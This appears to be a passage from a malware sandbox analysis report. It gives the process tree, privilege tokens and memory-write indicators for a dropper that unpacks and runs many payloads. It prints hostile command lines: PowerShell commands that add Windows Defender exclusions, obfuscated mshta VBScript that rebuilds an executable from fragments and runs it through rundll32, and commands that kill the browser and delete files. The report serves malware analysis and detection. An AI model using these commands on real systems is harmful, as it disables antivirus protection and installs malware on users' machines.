Token: SeSyncAgentPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeEnableDelegationPrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeManageVolumePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeImpersonatePrivilege	2196	Tue0741bc096fd881d2.exe
Token: SeCreateGlobalPrivilege	2196	Tue0741bc096fd881d2.exe
Token: 31	2196	Tue0741bc096fd881d2.exe
Token: 32	2196	Tue0741bc096fd881d2.exe
Token: 33	2196	Tue0741bc096fd881d2.exe
Token: 34	2196	Tue0741bc096fd881d2.exe
Token: 35	2196	Tue0741bc096fd881d2.exe
Token: SeDebugPrivilege	800	Tue07816149b72db00.exe
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	1784	taskkill.exe
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084
Token: SeShutdownPrivilege	3084
Token: SeCreatePagefilePrivilege	3084

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4660 wrote to memory of 3452	4660	CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe	setup_installer.exe
PID 4660 wrote to memory of 3452	4660	CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe	setup_installer.exe
PID 4660 wrote to memory of 3452	4660	CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe	setup_installer.exe
PID 3452 wrote to memory of 3496	3452	setup_installer.exe	setup_install.exe
PID 3452 wrote to memory of 3496	3452	setup_installer.exe	setup_install.exe
PID 3452 wrote to memory of 3496	3452	setup_installer.exe	setup_install.exe
PID 3496 wrote to memory of 3576	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3576	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3576	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 5036	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 5036	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 5036	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4068	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4068	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4068	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 276	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 276	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 276	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 216	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 216	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 216	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 2268	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 2268	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 2268	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3160	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3160	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3160	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 1828	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 1828	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 1828	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4464	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4464	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4464	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4408	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4408	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4408	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3192	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3192	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 3192	3496	setup_install.exe	cmd.exe
PID 3576 wrote to memory of 3128	3576	cmd.exe	powershell.exe
PID 3576 wrote to memory of 3128	3576	cmd.exe	powershell.exe
PID 3576 wrote to memory of 3128	3576	cmd.exe	powershell.exe
PID 3496 wrote to memory of 4668	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4668	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 4668	3496	setup_install.exe	cmd.exe
PID 4068 wrote to memory of 4416	4068	cmd.exe	Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416	4068	cmd.exe	Tue07ef9e317e0f6ae.exe
PID 4068 wrote to memory of 4416	4068	cmd.exe	Tue07ef9e317e0f6ae.exe
PID 5036 wrote to memory of 4088	5036	cmd.exe	Tue072fdbb8e4b2f5.exe
PID 5036 wrote to memory of 4088	5036	cmd.exe	Tue072fdbb8e4b2f5.exe
PID 276 wrote to memory of 4764	276	cmd.exe	Tue07a633a94f9.exe
PID 276 wrote to memory of 4764	276	cmd.exe	Tue07a633a94f9.exe
PID 3160 wrote to memory of 4048	3160	cmd.exe	Tue07e35cf558.exe
PID 3160 wrote to memory of 4048	3160	cmd.exe	Tue07e35cf558.exe
PID 3160 wrote to memory of 4048	3160	cmd.exe	Tue07e35cf558.exe
PID 3496 wrote to memory of 1492	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 1492	3496	setup_install.exe	cmd.exe
PID 3496 wrote to memory of 1492	3496	setup_install.exe	cmd.exe
PID 4464 wrote to memory of 912	4464	cmd.exe	Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912	4464	cmd.exe	Tue070aab9bc86b572.exe
PID 4464 wrote to memory of 912	4464	cmd.exe	Tue070aab9bc86b572.exe
PID 2268 wrote to memory of 2052	2268	cmd.exe	Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052	2268	cmd.exe	Tue07caa83bac5d15.exe
PID 2268 wrote to memory of 2052	2268	cmd.exe	Tue07caa83bac5d15.exe

C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe
"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4660

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3452

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue072fdbb8e4b2f5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:5036

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue072fdbb8e4b2f5.exe
Tue072fdbb8e4b2f5.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07ef9e317e0f6ae.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe
Tue07ef9e317e0f6ae.exe
5⤵
- Executes dropped EXE
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07a633a94f9.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:276

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe
Tue07a633a94f9.exe
5⤵
- Executes dropped EXE
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07b3bf87d8.exe
4⤵
PID:216

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe
Tue07b3bf87d8.exe
5⤵
- Executes dropped EXE
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07caa83bac5d15.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2268

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
Tue07caa83bac5d15.exe
5⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:2052

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
"{path}"
6⤵
- Executes dropped EXE
PID:2248

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe
"{path}"
6⤵
- Executes dropped EXE
PID:3968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07e35cf558.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3160

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe
Tue07e35cf558.exe
5⤵
- Executes dropped EXE
PID:4048

C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp" /SL5="$E01DA,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07267c17f2f5.exe
4⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe
Tue07267c17f2f5.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4216

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
6⤵
- Checks computer location settings
PID:5064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe" ) do taskkill -F -Im "%~nXU"
7⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:852

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
9⤵
- Checks computer location settings
PID:856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
10⤵
PID:2900

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
9⤵
- Checks computer location settings
PID:3596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
10⤵
PID:1772

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:2900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
11⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
11⤵
PID:3972

C:\Windows\SysWOW64\control.exe
control .\FUEj5.QM
11⤵
PID:4892

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
12⤵
- Loads dropped DLL
PID:3532

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
13⤵
PID:2264

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
14⤵
- Loads dropped DLL
PID:1848

C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Tue07267c17f2f5.exe"
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue070aab9bc86b572.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4464

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe
Tue070aab9bc86b572.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue071e59dc8292b4ef1.exe
4⤵
PID:3192

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe
Tue071e59dc8292b4ef1.exe
5⤵
- Executes dropped EXE
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 932
6⤵
- Program crash
PID:4568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue0750373995e75.exe
4⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe
Tue0750373995e75.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:764

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe
6⤵
- Executes dropped EXE
PID:2712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue0741bc096fd881d2.exe
4⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe
Tue0741bc096fd881d2.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:3232

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:2344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07816149b72db00.exe
4⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe
Tue07816149b72db00.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue07006d6b7c.exe
4⤵
PID:2008

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe
Tue07006d6b7c.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:1664

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
6⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:4356

C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe
"C:\Users\Admin\Documents\SHIsoob4Etj_lU6f_UIAVLsv.exe"
7⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:44244

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
8⤵
- Executes dropped EXE
PID:248184

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:318916

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /y .\aBiYKZC.31
9⤵
- Loads dropped DLL
PID:319356

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
8⤵
- Executes dropped EXE
PID:319024

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
9⤵
PID:319096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
10⤵
PID:5724

C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\FWsDwwvaVRZQ.bmp.exe"
8⤵
- Executes dropped EXE
PID:319004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
9⤵
PID:7344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
9⤵
PID:7536

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"
8⤵
- Executes dropped EXE
PID:318992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 452
9⤵
- Program crash
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 768
9⤵
- Program crash
PID:6296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800
9⤵
- Program crash
PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 800
9⤵
- Program crash
PID:7804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 816
9⤵
- Program crash
PID:8364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 984
9⤵
- Program crash
PID:8840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1016
9⤵
- Program crash
PID:9012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1360
9⤵
- Program crash
PID:9292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit
9⤵
PID:9372

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte.bmp.exe" /f
10⤵
- Kills process with taskkill
PID:9452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 318992 -s 1292
9⤵
- Program crash
PID:9436

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:318984

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
9⤵
PID:319284

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Camminato.xla & ping -n 5 localhost
9⤵
PID:319380

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:5928

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:9512

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:9524

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla
11⤵
PID:9616

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Plasmare.exe.pif
Plasmare.exe.pif J
11⤵
PID:9632

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:9644

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
10⤵
- Runs ping.exe
PID:9832

C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe"
8⤵
- Executes dropped EXE
- Adds Run key to start application
PID:318976

C:\Windows\SysWOW64\where.exe
where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
9⤵
PID:319300

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Calore.sldm & ping -n 5 localhost
9⤵
PID:5520

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:6312

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:9328

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:9344

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DSFRIKxgXaTKtMXZByrebjRJrDwrxjAhOWIxSGWRcDMpumUWppHSeWRsqWOyIdTLSGVitCiVojGUmHDEJyUkEHlStdzWSRotKwsm$" Avvenne.sldm
11⤵
PID:9500

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Marito.exe.pif
Marito.exe.pif x
11⤵
PID:9532

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:9576

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
10⤵
- Runs ping.exe
PID:9740

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"
8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:319480

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
8⤵
- Executes dropped EXE
PID:6052

C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R890Q.tmp\B2BCH2.exe.tmp" /SL5="$501FA,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2572

C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe
"C:\Users\Admin\AppData\Local\Temp\is-GALM5.tmp\djkdj778_______.exe" /S /UID=91
10⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe
"C:\Users\Admin\AppData\Local\Temp\aa-21301-41f-b8583-72d43cc0b3481\SHuhefaruly.exe"
11⤵
PID:9880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive & exit
12⤵
PID:10184

C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\oo3xgstd.wq2\gcleaner.exe /mixfive
13⤵
PID:10312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 452
14⤵
- Program crash
PID:10412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 764
14⤵
- Program crash
PID:10724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772
14⤵
- Program crash
PID:10840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 772
14⤵
- Program crash
PID:10900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 792
14⤵
- Program crash
PID:10996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 984
14⤵
- Program crash
PID:11272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 992
14⤵
- Program crash
PID:11396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe & exit
12⤵
PID:10332

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe
C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe
13⤵
PID:10516

C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe
"C:\Users\Admin\AppData\Local\Temp\bg3t0ut2.ijq\random.exe" -HELP
14⤵
PID:10612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe & exit
12⤵
PID:10472

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe
13⤵
PID:10560

C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\abwik511.gks\toolspab3.exe
14⤵
PID:10636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe & exit
12⤵
PID:10760

C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe
C:\Users\Admin\AppData\Local\Temp\swncvftv.qwx\rmaa1045.exe
13⤵
PID:10916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 10916 -s 696
14⤵
